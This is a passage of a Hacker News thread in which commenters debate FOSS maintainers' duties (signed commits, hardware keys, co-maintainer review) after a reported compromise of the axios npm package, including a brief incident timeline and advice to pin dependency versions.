          Required by who though? If your business etc depends upon some code, it's up to you to ensure its quality, surely? You copy some code onto your machine then it's your codebase, right?

          • lrvick 3 days ago ago

            While I think anyone unwilling to sign their code is negligent, I also feel anyone unwilling to ensure credible review of code has been done before pushing it to production is equally negligent.

      • lrvick 3 days ago ago

        Anyone that maintains code for others to consume has a basic obligation to do the bare minimum to make sure their reputations are not hijacked by bad actors.

        Just sign commits and reviews. It is so easy to stop these attacks that not doing so is like a doctor that refuses to wash their hands between patients.

        If you are not going to wash your hands do not be a doctor.

        If you are not going to sign your code do not be a FOSS maintainer.

        • 4ndrewl 3 days ago ago

          No they don't! They have literally no obligations to you - and you've got the MIT/APL/GPL license to prove it. You're getting the benefit of their labour for free!

          Even if they did sign the code, What's stopping them slipping some crypto link in. And do they also need to check all the transitive depdencies in their code?

          • lrvick 3 days ago ago

            They have basic obligations as highly trusted FOSS software maintainers, a role they allowed themselves to be elected into, to make sure their hard earned goodwill and trust is not stolen by a bad actor. They also have a basic obligation to make sure they have accountability and review of all code before it gets to their users.

            Sitting back and expecting Microsoft to keep the community safe is going to continue to end badly. The community has an obligation to each other.

            Like, no one is making someone go bring a bunch of food to feed the homeless, but if you do, you have some basic social obligation to make sure it is sanitary and not poison.

            People who give things away for free widely absolutely have obligations, and if they do not like those, they should hand off the project to a quorum of responsible maintainers and demote themselves to just a contributor.

            • 4ndrewl 3 days ago ago

              They literally owe you nothing. They can walk away tomorrow, sell their github account, introduce breaking changes, add bugs, die, add crypto links, whatever.

              >if they do not like those, they should hand off the project to a quoarum of >responsible maintainers and demote themselves to just a contributor.

              The most responsible thing to do is to release it under an OSS license and let whoever, yes - including you, fork and maintain their own copy if it's that important.

        • hahn-kev 3 days ago ago

          If you're paid then sure. Otherwise... It depends.

          • lrvick 3 days ago ago

            Is a doctor doing volunteer work still obligated to wash their hands between patients?

            Is a food pantry giving away free food obligated to check expiration dates and make sure the food is properly sealed?

            Volunteer work absolutely has obligations, and I do not know why software volunteers are exempt from any responsibility unless they are being paid.

            If you do not want to do the volunteer work in a safe way, please hand off the job to a volunteer willing to do so.

    • eviks 3 days ago ago

      "Anyone that cannot spend $40+ to give every FOSS maintainer a smartcard and maybe even separate machines for releases and make the more secure workflow truly 5 minutes has absolutely no business widely depending upon FOSS"

      • lrvick 3 days ago ago

        A $50 used laptop from goodwill and a $40 yubikey will do the job.

        If maintainers really cannot afford that, they should flag it as a major big bold print supply chain risk on the readme: "We cannot afford 4 yubikeys for our maintainers and thus all code is signed with software keys in virtual machines as a best effort defense. Donate to our fund [here] to raise $500 for dedicated release hardware"

        Friends and I have gotten 100s of yubikeys and nitrokeys donated to FOSS maintainers, but FOSS maintainers have to be willing to say they would use them and signal that they need them.

        Honestly though, anyone that cannot afford $40 I expect is at high risk of being bribed or having to give up contributing to take on more work, so we should significantly fund any project signaling that much desperation.

    • patrakov a day ago ago

      > Anyone that cannot take 5 minutes to set up commit signing with a $40 usb smartcard to prevent impersonation has absolutely no business writing widely depended upon FOSS software.

      No. As a user of your package, I want assurance that the package you publish does what it says it does and does not contain malware. This is different from the package having been published by you. I want protection against you going rogue, not only from you being impersonated. 2FA on your side does not protect me against you going rogue. A comaintainer does.

      So the correct quote would be: Anyone that cannot find a comaintainer to review all the code and to prevent deliberate sabotage has absolutely no business writing widely depended upon FOSS software.

  • toniantunovi 21 hours ago ago

    [dead]

  • dfir-lab 17 hours ago ago

    [dead]

  • jeremie_strand 2 days ago ago

    [dead]

  • jeremie_strand 2 days ago ago

    [dead]

  • mt18 2 days ago ago

    [dead]

  • arafeq 3 days ago ago

    [dead]

  • kanehorikawa 3 days ago ago

    [dead]

  • JackSmith_YC 3 days ago ago

    [dead]

  • scottburgess33 3 days ago ago

    [dead]

  • lexcamisa54 3 days ago ago

    [dead]

  • redoh 2 days ago ago

    [flagged]

    • panstromek 2 days ago ago

      Well, the hack didn't survive more than 2-3 hours if I'm not mistaken. I don't think that counts as "nobody acted on it."

      • panstromek 2 days ago ago

        Actually, from the OP, the timeline is:

        > March 31, 00:21 UTC: axios@1.14.1 published with plain-crypto-js@4.2.1 injected

        > March 31, around 01:00 UTC: axios@0.30.4 published with the same payload

        > March 31, around 01:00 UTC: first external detections

        > March 31, around 01:00 UTC: community members file issues reporting the compromise. The attacker deletes them using the compromised account.

        So it was found out almost immediately.

    • cyberax 2 days ago ago

      Another point: do NOT use the "~" or "^" versions for automatic updates. Just lock everything tight in your package files. Then have an alert on the lockfile changes.

    • stingraycharles 2 days ago ago

      Please no AI posts on HN.